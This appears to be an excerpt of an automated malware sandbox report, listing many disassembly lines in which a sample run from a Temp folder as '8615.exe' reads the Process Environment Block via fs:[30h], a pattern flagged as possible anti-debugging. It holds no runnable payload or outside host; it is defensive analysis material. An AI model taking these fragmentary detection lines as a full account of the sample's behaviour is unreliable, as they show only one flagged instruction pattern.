Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B472240 mov ecx, dword ptr fs:[00000030h] 24_2_6B472240
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B472240 mov eax, dword ptr fs:[00000030h] 24_2_6B472240
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B479240 mov eax, dword ptr fs:[00000030h] 24_2_6B479240
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B479240 mov eax, dword ptr fs:[00000030h] 24_2_6B479240
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B479240 mov eax, dword ptr fs:[00000030h] 24_2_6B479240
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B479240 mov eax, dword ptr fs:[00000030h] 24_2_6B479240
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B504257 mov eax, dword ptr fs:[00000030h] 24_2_6B504257
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B504248 mov eax, dword ptr fs:[00000030h] 24_2_6B504248
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B4B927A mov eax, dword ptr fs:[00000030h] 24_2_6B4B927A
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B52B260 mov eax, dword ptr fs:[00000030h] 24_2_6B52B260
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B52B260 mov eax, dword ptr fs:[00000030h] 24_2_6B52B260
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B548A62 mov eax, dword ptr fs:[00000030h] 24_2_6B548A62
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B488A0A mov eax, dword ptr fs:[00000030h] 24_2_6B488A0A
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B493A1C mov eax, dword ptr fs:[00000030h] 24_2_6B493A1C
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B475210 mov eax, dword ptr fs:[00000030h] 24_2_6B475210
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B475210 mov ecx, dword ptr fs:[00000030h] 24_2_6B475210
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B475210 mov eax, dword ptr fs:[00000030h] 24_2_6B475210
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B475210 mov eax, dword ptr fs:[00000030h] 24_2_6B475210
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B52D208 mov eax, dword ptr fs:[00000030h] 24_2_6B52D208
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B52D208 mov eax, dword ptr fs:[00000030h] 24_2_6B52D208
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B49A229 mov eax, dword ptr fs:[00000030h] 24_2_6B49A229
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B49A229 mov eax, dword ptr fs:[00000030h] 24_2_6B49A229
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B49A229 mov eax, dword ptr fs:[00000030h] 24_2_6B49A229
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B49A229 mov eax, dword ptr fs:[00000030h] 24_2_6B49A229
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B49A229 mov eax, dword ptr fs:[00000030h] 24_2_6B49A229
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B49A229 mov eax, dword ptr fs:[00000030h] 24_2_6B49A229
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B49A229 mov eax, dword ptr fs:[00000030h] 24_2_6B49A229
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B49A229 mov eax, dword ptr fs:[00000030h] 24_2_6B49A229
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B49A229 mov eax, dword ptr fs:[00000030h] 24_2_6B49A229
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B474A20 mov eax, dword ptr fs:[00000030h] 24_2_6B474A20
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B474A20 mov eax, dword ptr fs:[00000030h] 24_2_6B474A20
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B4FEA20 mov eax, dword ptr fs:[00000030h] 24_2_6B4FEA20
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B478239 mov eax, dword ptr fs:[00000030h] 24_2_6B478239
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B478239 mov eax, dword ptr fs:[00000030h] 24_2_6B478239
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B478239 mov eax, dword ptr fs:[00000030h] 24_2_6B478239
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B4A2ACB mov eax, dword ptr fs:[00000030h] 24_2_6B4A2ACB
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B475AC0 mov eax, dword ptr fs:[00000030h] 24_2_6B475AC0
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B475AC0 mov eax, dword ptr fs:[00000030h] 24_2_6B475AC0
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B475AC0 mov eax, dword ptr fs:[00000030h] 24_2_6B475AC0
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B548ADD mov eax, dword ptr fs:[00000030h] 24_2_6B548ADD
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B473ACA mov eax, dword ptr fs:[00000030h] 24_2_6B473ACA
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B4A2AE4 mov eax, dword ptr fs:[00000030h] 24_2_6B4A2AE4
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B534AEF mov eax, dword ptr fs:[00000030h] 24_2_6B534AEF
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B534AEF mov eax, dword ptr fs:[00000030h] 24_2_6B534AEF
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B534AEF mov eax, dword ptr fs:[00000030h] 24_2_6B534AEF
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B534AEF mov eax, dword ptr fs:[00000030h] 24_2_6B534AEF
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B534AEF mov eax, dword ptr fs:[00000030h] 24_2_6B534AEF
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B534AEF mov eax, dword ptr fs:[00000030h] 24_2_6B534AEF
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B534AEF mov eax, dword ptr fs:[00000030h] 24_2_6B534AEF
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B534AEF mov eax, dword ptr fs:[00000030h] 24_2_6B534AEF
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B534AEF mov eax, dword ptr fs:[00000030h] 24_2_6B534AEF
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B534AEF mov eax, dword ptr fs:[00000030h] 24_2_6B534AEF
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B534AEF mov eax, dword ptr fs:[00000030h] 24_2_6B534AEF
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B534AEF mov eax, dword ptr fs:[00000030h] 24_2_6B534AEF
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B534AEF mov eax, dword ptr fs:[00000030h] 24_2_6B534AEF
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B534AEF mov eax, dword ptr fs:[00000030h] 24_2_6B534AEF
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B4ADA88 mov eax, dword ptr fs:[00000030h] 24_2_6B4ADA88
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B4ADA88 mov eax, dword ptr fs:[00000030h] 24_2_6B4ADA88
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B4AD294 mov eax, dword ptr fs:[00000030h] 24_2_6B4AD294
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B4AD294 mov eax, dword ptr fs:[00000030h] 24_2_6B4AD294
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B4752A5 mov eax, dword ptr fs:[00000030h] 24_2_6B4752A5
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B4752A5 mov eax, dword ptr fs:[00000030h] 24_2_6B4752A5
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B4752A5 mov eax, dword ptr fs:[00000030h] 24_2_6B4752A5
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B4752A5 mov eax, dword ptr fs:[00000030h] 24_2_6B4752A5
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B4752A5 mov eax, dword ptr fs:[00000030h] 24_2_6B4752A5
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B471AA0 mov eax, dword ptr fs:[00000030h] 24_2_6B471AA0
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B4A5AA0 mov eax, dword ptr fs:[00000030h] 24_2_6B4A5AA0
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B4A5AA0 mov eax, dword ptr fs:[00000030h] 24_2_6B4A5AA0
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B4A12BD mov esi, dword ptr fs:[00000030h] 24_2_6B4A12BD
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B4A12BD mov eax, dword ptr fs:[00000030h] 24_2_6B4A12BD
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B4A12BD mov eax, dword ptr fs:[00000030h] 24_2_6B4A12BD
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B48AAB0 mov eax, dword ptr fs:[00000030h] 24_2_6B48AAB0
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B48AAB0 mov eax, dword ptr fs:[00000030h] 24_2_6B48AAB0
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B49B944 mov eax, dword ptr fs:[00000030h] 24_2_6B49B944
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B49B944 mov eax, dword ptr fs:[00000030h] 24_2_6B49B944
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B47395E mov eax, dword ptr fs:[00000030h] 24_2_6B47395E
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B47395E mov eax, dword ptr fs:[00000030h] 24_2_6B47395E
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B53E962 mov eax, dword ptr fs:[00000030h] 24_2_6B53E962
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B548966 mov eax, dword ptr fs:[00000030h] 24_2_6B548966
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B47B171 mov eax, dword ptr fs:[00000030h] 24_2_6B47B171
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B47B171 mov eax, dword ptr fs:[00000030h] 24_2_6B47B171
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B479100 mov eax, dword ptr fs:[00000030h] 24_2_6B479100
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B479100 mov eax, dword ptr fs:[00000030h] 24_2_6B479100
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B479100 mov eax, dword ptr fs:[00000030h] 24_2_6B479100
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B480100 mov eax, dword ptr fs:[00000030h] 24_2_6B480100
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B480100 mov eax, dword ptr fs:[00000030h] 24_2_6B480100
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B480100 mov eax, dword ptr fs:[00000030h] 24_2_6B480100
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B494120 mov eax, dword ptr fs:[00000030h] 24_2_6B494120
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B494120 mov eax, dword ptr fs:[00000030h] 24_2_6B494120
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B494120 mov eax, dword ptr fs:[00000030h] 24_2_6B494120
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B494120 mov eax, dword ptr fs:[00000030h] 24_2_6B494120
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B494120 mov ecx, dword ptr fs:[00000030h] 24_2_6B494120
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B4A513A mov eax, dword ptr fs:[00000030h] 24_2_6B4A513A
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B4A513A mov eax, dword ptr fs:[00000030h] 24_2_6B4A513A
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B473138 mov ecx, dword ptr fs:[00000030h] 24_2_6B473138
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B4899C7 mov eax, dword ptr fs:[00000030h] 24_2_6B4899C7
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B4899C7 mov eax, dword ptr fs:[00000030h] 24_2_6B4899C7
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B4899C7 mov eax, dword ptr fs:[00000030h] 24_2_6B4899C7
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B4899C7 mov eax, dword ptr fs:[00000030h] 24_2_6B4899C7
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B47B1E1 mov eax, dword ptr fs:[00000030h] 24_2_6B47B1E1
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B47B1E1 mov eax, dword ptr fs:[00000030h] 24_2_6B47B1E1
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B47B1E1 mov eax, dword ptr fs:[00000030h] 24_2_6B47B1E1
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B4731E0 mov eax, dword ptr fs:[00000030h] 24_2_6B4731E0
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B5489E7 mov eax, dword ptr fs:[00000030h] 24_2_6B5489E7
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B5041E8 mov eax, dword ptr fs:[00000030h] 24_2_6B5041E8
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B49C182 mov eax, dword ptr fs:[00000030h] 24_2_6B49C182
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B4AA185 mov eax, dword ptr fs:[00000030h] 24_2_6B4AA185
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B47519E mov eax, dword ptr fs:[00000030h] 24_2_6B47519E
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B47519E mov ecx, dword ptr fs:[00000030h] 24_2_6B47519E
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B53A189 mov eax, dword ptr fs:[00000030h] 24_2_6B53A189
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B53A189 mov ecx, dword ptr fs:[00000030h] 24_2_6B53A189
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B4A4190 mov eax, dword ptr fs:[00000030h] 24_2_6B4A4190
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B4A2990 mov eax, dword ptr fs:[00000030h] 24_2_6B4A2990
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B54F1B5 mov eax, dword ptr fs:[00000030h] 24_2_6B54F1B5
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B54F1B5 mov eax, dword ptr fs:[00000030h] 24_2_6B54F1B5
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B4A61A0 mov eax, dword ptr fs:[00000030h] 24_2_6B4A61A0
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B4A61A0 mov eax, dword ptr fs:[00000030h] 24_2_6B4A61A0
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B4F51BE mov eax, dword ptr fs:[00000030h] 24_2_6B4F51BE
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B4F51BE mov eax, dword ptr fs:[00000030h] 24_2_6B4F51BE
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B4F51BE mov eax, dword ptr fs:[00000030h] 24_2_6B4F51BE
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B4F51BE mov eax, dword ptr fs:[00000030h] 24_2_6B4F51BE
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B4AC9BF mov eax, dword ptr fs:[00000030h] 24_2_6B4AC9BF
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B4AC9BF mov eax, dword ptr fs:[00000030h] 24_2_6B4AC9BF
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B4999BF mov ecx, dword ptr fs:[00000030h] 24_2_6B4999BF
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B4999BF mov ecx, dword ptr fs:[00000030h] 24_2_6B4999BF
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B4999BF mov eax, dword ptr fs:[00000030h] 24_2_6B4999BF
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B4999BF mov ecx, dword ptr fs:[00000030h] 24_2_6B4999BF
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B4999BF mov ecx, dword ptr fs:[00000030h] 24_2_6B4999BF
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B4999BF mov eax, dword ptr fs:[00000030h] 24_2_6B4999BF
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B4999BF mov ecx, dword ptr fs:[00000030h] 24_2_6B4999BF
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B4999BF mov ecx, dword ptr fs:[00000030h] 24_2_6B4999BF
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B4999BF mov eax, dword ptr fs:[00000030h] 24_2_6B4999BF
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B4999BF mov ecx, dword ptr fs:[00000030h] 24_2_6B4999BF
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B4999BF mov ecx, dword ptr fs:[00000030h] 24_2_6B4999BF
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B4999BF mov eax, dword ptr fs:[00000030h] 24_2_6B4999BF
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B5349A4 mov eax, dword ptr fs:[00000030h] 24_2_6B5349A4
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B5349A4 mov eax, dword ptr fs:[00000030h] 24_2_6B5349A4
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B5349A4 mov eax, dword ptr fs:[00000030h] 24_2_6B5349A4
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B5349A4 mov eax, dword ptr fs:[00000030h] 24_2_6B5349A4
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B477055 mov eax, dword ptr fs:[00000030h] 24_2_6B477055
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B475050 mov eax, dword ptr fs:[00000030h] 24_2_6B475050
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B475050 mov eax, dword ptr fs:[00000030h] 24_2_6B475050
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B475050 mov eax, dword ptr fs:[00000030h] 24_2_6B475050
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B532073 mov eax, dword ptr fs:[00000030h] 24_2_6B532073
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B541074 mov eax, dword ptr fs:[00000030h] 24_2_6B541074
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B49F86D mov eax, dword ptr fs:[00000030h] 24_2_6B49F86D
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B544015 mov eax, dword ptr fs:[00000030h] 24_2_6B544015
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B544015 mov eax, dword ptr fs:[00000030h] 24_2_6B544015
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B476800 mov eax, dword ptr fs:[00000030h] 24_2_6B476800
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B476800 mov eax, dword ptr fs:[00000030h] 24_2_6B476800
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B476800 mov eax, dword ptr fs:[00000030h] 24_2_6B476800
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B488800 mov eax, dword ptr fs:[00000030h] 24_2_6B488800
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B54F019 mov eax, dword ptr fs:[00000030h] 24_2_6B54F019
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B54F019 mov eax, dword ptr fs:[00000030h] 24_2_6B54F019
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B47F018 mov eax, dword ptr fs:[00000030h] 24_2_6B47F018
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B47F018 mov eax, dword ptr fs:[00000030h] 24_2_6B47F018
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B48B02A mov eax, dword ptr fs:[00000030h] 24_2_6B48B02A
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B48B02A mov eax, dword ptr fs:[00000030h] 24_2_6B48B02A
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B48B02A mov eax, dword ptr fs:[00000030h] 24_2_6B48B02A
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B48B02A mov eax, dword ptr fs:[00000030h] 24_2_6B48B02A
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B4A4020 mov edi, dword ptr fs:[00000030h] 24_2_6B4A4020
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B49A830 mov eax, dword ptr fs:[00000030h] 24_2_6B49A830
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B49A830 mov eax, dword ptr fs:[00000030h] 24_2_6B49A830
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B49A830 mov eax, dword ptr fs:[00000030h] 24_2_6B49A830
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B49A830 mov eax, dword ptr fs:[00000030h] 24_2_6B49A830
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B4770C0 mov eax, dword ptr fs:[00000030h] 24_2_6B4770C0
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B4770C0 mov eax, dword ptr fs:[00000030h] 24_2_6B4770C0
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B4740E1 mov eax, dword ptr fs:[00000030h] 24_2_6B4740E1
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B4740E1 mov eax, dword ptr fs:[00000030h] 24_2_6B4740E1
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B4740E1 mov eax, dword ptr fs:[00000030h] 24_2_6B4740E1
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B4758EC mov eax, dword ptr fs:[00000030h] 24_2_6B4758EC
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B49B8E4 mov eax, dword ptr fs:[00000030h] 24_2_6B49B8E4
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B49B8E4 mov eax, dword ptr fs:[00000030h] 24_2_6B49B8E4
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B4828FD mov eax, dword ptr fs:[00000030h] 24_2_6B4828FD
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B4828FD mov eax, dword ptr fs:[00000030h] 24_2_6B4828FD
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B4828FD mov eax, dword ptr fs:[00000030h] 24_2_6B4828FD
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B52E0E9 mov eax, dword ptr fs:[00000030h] 24_2_6B52E0E9
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B52E0E9 mov eax, dword ptr fs:[00000030h] 24_2_6B52E0E9
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B473880 mov eax, dword ptr fs:[00000030h] 24_2_6B473880
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B473880 mov eax, dword ptr fs:[00000030h] 24_2_6B473880
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B4B90AF mov eax, dword ptr fs:[00000030h] 24_2_6B4B90AF
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B4828AE mov eax, dword ptr fs:[00000030h] 24_2_6B4828AE
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B4828AE mov eax, dword ptr fs:[00000030h] 24_2_6B4828AE
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B4828AE mov eax, dword ptr fs:[00000030h] 24_2_6B4828AE
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B4828AE mov ecx, dword ptr fs:[00000030h] 24_2_6B4828AE
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B4828AE mov eax, dword ptr fs:[00000030h] 24_2_6B4828AE
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B4828AE mov eax, dword ptr fs:[00000030h] 24_2_6B4828AE
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B4838A4 mov eax, dword ptr fs:[00000030h] 24_2_6B4838A4
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B4838A4 mov ecx, dword ptr fs:[00000030h] 24_2_6B4838A4
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B4AF0BF mov ecx, dword ptr fs:[00000030h] 24_2_6B4AF0BF
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B4AF0BF mov eax, dword ptr fs:[00000030h] 24_2_6B4AF0BF
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B4AF0BF mov eax, dword ptr fs:[00000030h] 24_2_6B4AF0BF
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B47E8B0 mov eax, dword ptr fs:[00000030h] 24_2_6B47E8B0
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B47E8B0 mov eax, dword ptr fs:[00000030h] 24_2_6B47E8B0
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B47E8B0 mov eax, dword ptr fs:[00000030h] 24_2_6B47E8B0
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B47E8B0 mov eax, dword ptr fs:[00000030h] 24_2_6B47E8B0
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B47E8B0 mov eax, dword ptr fs:[00000030h] 24_2_6B47E8B0
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B47E8B0 mov eax, dword ptr fs:[00000030h] 24_2_6B47E8B0
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B47A745 mov eax, dword ptr fs:[00000030h] 24_2_6B47A745
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B4ADF4C mov eax, dword ptr fs:[00000030h] 24_2_6B4ADF4C
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B505F5F mov eax, dword ptr fs:[00000030h] 24_2_6B505F5F
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B505F5F mov eax, dword ptr fs:[00000030h] 24_2_6B505F5F
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B505F5F mov eax, dword ptr fs:[00000030h] 24_2_6B505F5F
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B505F5F mov eax, dword ptr fs:[00000030h] 24_2_6B505F5F
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B505F5F mov eax, dword ptr fs:[00000030h] 24_2_6B505F5F
